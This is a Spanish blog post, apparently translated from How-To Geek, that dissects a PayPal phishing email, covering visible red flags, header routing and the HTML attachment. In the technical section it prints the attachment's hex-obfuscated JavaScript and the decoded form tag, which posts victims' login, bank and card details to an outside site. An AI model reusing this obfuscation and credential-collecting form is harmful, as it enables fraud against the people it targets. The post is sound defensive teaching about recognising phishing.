sábado, 16 de abril de 2011

Seguridad online: disección de la anatomía de un correo de phishing.

Volvamos al tema de la seguridad online, esta vez les traigo un trabajo de HTG sobre el phishing, me pareció interesante porque revisa algunos detalles de los que habitualmente no son muy evidentes para el común de la gente pero que no son difíciles de entender o seguir.
El phishing hoy significa quebrantos por miles de millones de dólares y cada vez el diseño de la estafa es mas sofisticado, vale entonces que revisemos algunos de los indicadores que pueden hacernos dudar de la autenticidad de un correo o una página web. Antes hemos visto que la seguridad debe entenderse como un hábito, mas que como una serie de políticas a seguir, y hemos tocado temas relacionados en nuestro espacio. Sirva este artículo de referencia adicional (el original aquí), en estos casos como en muchos otros, es válido el proverbio, "mejor que sobre que no que falte". Provecho!

Seguridad online: disección de la anatomía de un correo de phishing.
En el mundo actual donde la información de todos está en línea, el phishing es uno de los ataques en línea más populares y devastadores, porque siempre se puede limpiar un virus, pero si tus datos bancarios son robados, estás en problemas. He aquí un desglose de uno de esos ataques que hemos recibido.
No pienses que sólo tus datos bancarios son importantes: después de todo, si alguien gana el control sobre los datos de acceso a tu cuenta no sólo conocerá la información contenida en la misma, hay probabilidades de que la misma información pueda ser utilizada para acceder a otras varias cuentas. Y si comprometen tu cuenta de correo electrónico, podría restablecer todas las demás contraseñas.
Así que además de mantener contraseñas seguras y diferentes, tienes que estar siempre en la búsqueda de correos electrónicos falsos enmascarados como reales. Aunque la mayoría de los intentos de phishing provienen de aficionados, algunos son bastante convincentes por lo que es importante entender cómo reconocerlos a nivel de superficie, así como conocer la forma en que trabajan bajo el capó.
Examinar lo que está a la vista
Nuestro correo electrónico ejemplo, como la mayoría de los intentos de phishing, le "avisa" sobre alguna actividad en su cuenta PayPal que, en circunstancias normales, sería alarmante. Así que el llamado a la acción es verificar y restaurar su cuenta mediante el envío de casi cada pieza de información personal que usted pueda imaginar. Una vez más, esto es bastante simplista.
Aunque ciertamente hay excepciones, casi todos correos electrónicos de phishing y fraude van llenos de banderas rojas directamente en los propios mensajes. Incluso si el texto es convincente, usted puede encontrar muchos errores en todo el cuerpo del mensajes que indican que el mensaje no es de fiar.

El cuerpo del mensaje
Clic para ampliar.
A primera vista, este es uno de los mejores correos electrónicos de phishing que he visto. No hay faltas de ortografía o gramaticales y es bastante abundante en palabras de acuerdo a lo que cabría esperar. Sin embargo, hay algunas banderas rojas que se pueden ver al examinar el contenido un poco más de cerca.
  • "Paypal" - Lo correcto es "PayPal" (P mayúscula). Usted puede ver que se usan ambos casos en el mensaje. Las empresas regularmente son muy cuidadosas con sus marcas, así que algo así no pasaría un proceso de corrección.
  • "allow ActiveX" - ¿Cuántas veces has visto un negocio Web legítimo del tamaño de Paypal utilizar un componente propietario que sólo funciona en un único navegador, sobre todo cuando estos soportan múltiples navegadores? Claro, en alguna parte alguna compañía quizás lo hace, pero esto es una bandera roja.
  • "securely". - Observe cómo esta palabra no se alinea al margen con el resto del texto de párrafo. Incluso si estiro la ventana un poco más, no se ajusta correctamente.
  • "Paypal" - El espacio antes del signo de exclamación parece torpe. Es solo otro rasgo que estoy seguro no estaría en un correo electrónico legítimo.
  • "PayPal- Account Update Form.pdf.htm" - ¿Por qué PayPal adjunta un "PDF", especialmente cuando podría enlazarnos a una página en su sitio? Además, ¿por qué tratan de ocultar un archivo HTML como un archivo PDF? Esta es la mayor señal de alerta de todas.

El encabezado del mensaje
Clic para ampliar.
Al echar un vistazo a la cabecera del mensaje, aparecen dos banderas rojas adicionales:
  • La dirección origen es test@test.com.
  • La dirección de destino está omitida. No fui yo quien lo borró, simplemente no es parte de la cabecera del mensaje estándar. Normalmente, una empresa que tiene su nombre (el suyo no el de la empresa n.d.t) personaliza el mensaje de correo usándolo.
El adjunto.
Cuando abro el archivo adjunto, puede ver inmediatamente que el diseño no es correcto, ya que falta la información de estilo. Una vez más, ¿por qué PayPal envía un formulario HTML por correo cuando simplemente podría dar un enlace a su sitio?

Nota: usamos el visor de adjuntos HTML incorporado de Gmail para esto, pero le recomiendo NO abrir archivos adjuntos de estafadores. Nunca jamás Muy a menudo contienen exploits que instalarán troyanos en su PC para robar información de su cuenta.
Clic para ampliar
Un poco más abajo se puede ver que el formulario no sólo pide nuestra información de acceso PayPal, sino además información bancaria y de tarjetas de crédito. Además, algunas de las imágenes no se ven.
Clic para ampliar.
Es obvio que este intento de phishing va a por todas de un solo golpe.

El desglose técnico.
Si bien es muy claro que se trata de un intento de phishing basados en lo que a simple vista se observa, vamos a descomponer los detalles técnicos del correo electrónico y veremos qué podemos encontrar.

Información del Anexo.
Lo primero que observaremos será el código fuente HTML del formulario adjunto que es lo que envía los datos al sitio falso.
Al ver rápidamente la fuente, todos los enlaces aparecen como válidos dado que apuntan sea a "paypal.com" o "paypalobjects.com", que son ambos de fiar.
Clic para ampliar
Ahora vamos a echar un vistazo a algunos datos básicos que firefox extrae de la página.
Clic para ampliar
Como puede ver, algunos de los gráficos se extraen de los dominios "blessedtobe.com", "goodhealthpharmacy.com" y "pic-upload.de" en lugar de los dominios fiables de PayPal.
Clic para ampliar
La información de los encabezados de correo electrónico.
A continuación echaremos un vistazo a los encabezados planos del mensaje de correo electrónico. Gmail provee esta posibilidad a través de la opción de menú Mostrar original en el mensaje.
Clic para ampliar
Observando en la información del encabezado del mensaje original, se puede ver este mensaje se hizo con Outlook Express 6. Dudo que PayPal tenga a alguien en el personal que envíe cada uno de estos mensajes de forma manual a través de un cliente de correo electrónico obsoleto.
Clic para ampliar
Mire ahora en la información de enrutamiento, podemos ver la dirección IP del remitente y el servidor de retransmisión de correo.
Clic para ampliar
La dirección IP "Usuario" es el remitente original. Haciendo una búsqueda rápida en la información de IP, podemos ver que la IP origen está en Alemania.
Clic para ampliar
Y cuando nos fijamos en la dirección IP del servidor de correo de retransmisión (mail.itak.at) podemos ver que es un proveedor de Internet con sede en Austria. Dudo que PayPal enrute sus correos electrónicos directamente a través de un ISP con base en Austria cuando tienen granjas de servidores masivas que fácilmente podrían manejar esta tarea.
Clic para ampliar
¿Entonces, hacia dónde van los datos?
Así que hemos determinado claramente se trata de un correo electrónico de phishing y reunimos algunos datos acerca del origen del mensaje, pero ¿qué hay con el destino de los datos que envías?
Para ver esto, tenemos que salvar primero los datos del adjunto HTM en nuestro escritorio y luego abrirlos en un editor de texto. Recorriendo el texto, todo parece estar en orden, excepto cuando llegamos a un bloque Javascript de aspecto sospechoso.
Clic para ampliar
Descomponiendo el código fuente completo del último bloque Javascript, veremos:
<script language=”JavaScript” type=”text/javascript”>
// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e222

06d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f77777
72e646578706f737572652e6e65742f6262732f646174612f7665726966792e
706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y);
</script>

Cada vez que vea una cadena larga de letras y números revueltos aparentemente aleatorios incrustado en un bloque de Javascript, por lo general es algo sospechoso. Descomponiendo el código completo, la variable "x" toma el valor de esta larga cadena que luego es decodificada en la variable "y". El resultado final de la variable "y" es escrito luego en el documento como HTML.
Dado que la cadena está compuesta de números del 0-9 y letras de la a a la f, lo más probable es que esté codificada usando una conversión ASSCI a hexadecimal simple:


3c666f726d206e616d653d226d61696e222069643d226d61
696e22206d6574686f643d22706f73742220616374696f6e3
d22687474703a2f2f7777772e646578706f737572652e6e65
742f6262732f646174612f7665726966792e706870223e


Se traduce en:

<form name="main" id="main" method="post" action="http://www.dexposure.net/bbs/data/verify.php">

No es una coincidencia que el resultado sea una forma válida de etiqueta HTML que envía los resultados no a PayPal, sino a un sitio sospechoso.

Además, al ver el código fuente HTML del formulario, usted verá que esta etiqueta de formulario no es visible porque se genera de forma dinámica a través de Javascript. Esta es una forma inteligente de ocultar lo que el código HTML está haciendo, si alguien fuera a ver simplemente el código fuente generado de los datos adjuntos (como hicimos antes), en vez de abrir el archivo adjunto directamente en un editor de texto.
Clic para ampliar
Si ejecutamos un whois rápidamente en el sitio sospechoso, podemos ver que se trata de un dominio alojado en un servidor web popular, 1and1.
Clic para ampliar
Lo que destaca es que el dominio utiliza un nombre legible (en vez de algo así como "dfh3sjhskjhw.net") y el dominio ha estado registrado por 4 años. Debido a esto, creo que este dominio fue secuestrado y utilizado como un peón en este intento de phishing.

El cinismo es una buena defensa
Cuando se trata de la seguridad en línea, nunca está de más tener una buena dosis de cinismo.
Aunque estoy seguro de que hay más señales de alerta en el correo electrónico ejemplo, lo que hemos señalado anteriormente, son indicadores que vimos después de sólo unos minutos de examen. Hipotéticamente, si a nivel de superficie el correo electrónico imita su homólogo legítimo al 100%, el análisis técnico todavía revelará su verdadera naturaleza. Por eso es importante examinar tanto lo que puede como lo que no puede ver.

Descargar la versión pdf.